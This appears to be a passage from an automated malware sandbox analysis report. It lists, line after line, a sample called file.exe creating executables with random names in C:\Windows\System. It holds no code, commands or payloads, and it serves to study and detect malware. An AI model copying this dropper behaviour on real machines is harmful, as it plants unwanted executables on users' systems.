Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iHSYLud.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyQdqmC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sabRErB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZTSJHKb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xNhRSWh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jtnQpnb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hEUEsIC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UqXZtcb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dbgHMyC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dmPtXnK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pnGqAlS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LYzOvkf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qQyXqOp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SxjZpBy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QqSzknx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YIjJOqk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bymvMyH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lyMiIxb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yuTigyc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fWWVlTg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OpMgkKg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mPNsbfH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tJmWuwF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EDndQMl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JKpmIVS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jAqlPqL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fXSZuyj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DNhkeWm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RKUSbZV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WdIXuil.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTREvJC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ltlcnHD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTpsbWr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HHsWpNX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IofoOIp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iJpJhmt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mByREeI.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EkcZQPq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\StIsyPE.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zYyqoWF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQkDiSP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YYCxOQh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ccbrmxM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dMXkTWG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MydOwjq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tzOEnrH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVTiBjz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uSdaSKW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WOvgLKK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DrKJjXc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rgBmwKj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ajEytdP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VExclqz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZohDODH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAjIjRa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WZkiNdG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EzVUaNc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EENzfBP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Uvtpjkd.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rXBWFEL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ihDRfqA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ztQluWW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bpCJdvZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fyffsXe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cyvijMt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BnLcQMe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LOvnxUx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wpjxcMS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HnTfvAZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ykZgpGK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\usscfzm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DbVBXPi.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fEOJwwW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WTLAzgJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BMxbfij.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJZTVhW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HeXCeXe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vUKZkjM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AXEGSHs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YFzrUDj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJFWveO.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jkErNHB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KEULPTl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MgoHIfZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJZyUBH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DCqXTox.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LTWTGcY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BpqsHCR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UExJWUr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwjWQVv.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gKbbPbF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvowvSL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gAPrxpM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pbwrbNh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VdwdSnC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ffPPQcz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGUHzJz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIthybV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mtnXczE.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nkFLDPI.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\glgdLrR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TBNKhIN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uwKMlqy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XqXHiyf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sHbEZkY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uaJCfvY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iEDLgeS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ppfNNTX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ssUJwoR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wNVvJxX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eQlnkhq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rVmcjTa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bFsdWPU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YUQTINM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GmNUXAr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOpjlAo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vixYnHG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PbUiiSM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CGpcHNw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mEVTdIJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RcAqfwv.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fylerHE.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ABievJY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMaKiZu.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sDLqeeh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MKAkyBP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAngvPh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yzVBTwc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lrIaMFU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uHZGZjz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JUxucoT.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JRnaUrS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CpMhLMx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sFwDWFc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eaXsKmO.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CVYvaQs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVJdttA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\delwiax.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ASKjfZy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ndpwHPZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dPvMBBP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVpmxhg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgBtrMU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vKoIcLB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkIkkhX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TQUlNhY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZDeifCM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iIwdGAS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uNQcZEb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wibjUVa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iYYYydA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NVxCwjX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TscCBWf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VPuwqFY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eLYbCEG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HEPcUok.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xyokMuX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gCZFmUf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DtVOaSb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ArNQyZf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\izzcVgF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eXUokzg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YnfMwga.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\caYiRYR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RgcKJVt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VGaSwYr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOGcIfs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uRBSbtU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HuKkgJY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FHjAcHx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vREuzRr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WlVmTit.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VwIvzCk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XAgYYqB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UiAsnNy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QdDnaqt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ftWkAMN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PRQFErV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NyhRMmW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTVvNoy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fYMwhpS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQPgIol.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\snZBbmy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CoTJSDT.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mWAGJFM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sPniyBl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HUohYxb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tRGqWXW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\chBMsUn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tXVZMjj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sGYPztO.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dCnJkoQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GoSpvOG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JCZRmvQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zzbooXY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sJZigTD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XWzPvUm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yXkrKHV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bsgTRXG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMMnfcQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kPkYoOt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZlvPlxy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DBfMBcY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jYFqRXp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NrRaZIJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NLJeLdM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IEswIyo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aBqatWR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kFAVWnk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EMuPVcI.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gXwIlxx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIXgzbs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fIqTNJz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VgNRTsd.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\whRtinB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QZBRXHU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OVdNTki.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nKUJunm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PUqZmPS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ukkpYme.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IjDqKMU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PaGFrFU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rtBLYbw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hMvDOJd.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XJEUdeq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rKZvlov.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KeLPRxW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wnWUbPS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HbWODob.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HNocQDn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MLxwqET.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gQbnwXn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZXNyiNu.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LPMtFlZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AONeoTK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FoekgWP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\skgGGJN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xVIixqx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ckHJCFb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NuxBytj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mXElbHo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rwUXwnj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wCJLXKb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EZbURBQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgiIXgf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oCLXTVT.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pPLiGBV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RtRmRJz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFpkhGM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rfpCYxf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ucDGEkw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SNcreuq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lVudyTV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JGfFPYZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAzCYwU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IBWzTMA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rDRaLhy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lQcYvMS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NDapyRM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AQSffhY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SOFlTuM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jqUGnrw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BNgUfBr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fhxlOMT.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NzANgdB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jzfTIlb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uJEYoyF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gPTriDK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PrFZfUv.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZCyEzte.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QrBMIBp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VsobEcA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PLFTiIe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PPOtBBY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SAfbgcC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\geBTNDq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BtXtEfY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NqPZXyD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rQJmlSe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cLSDHvv.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UyqOZIb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OgBLDNx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\brplcms.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvkREuJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AbenojY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hzIYZSD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pzbELEW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hyzwXgh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bxBimDh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\roZGxps.exe	Jump to behavior
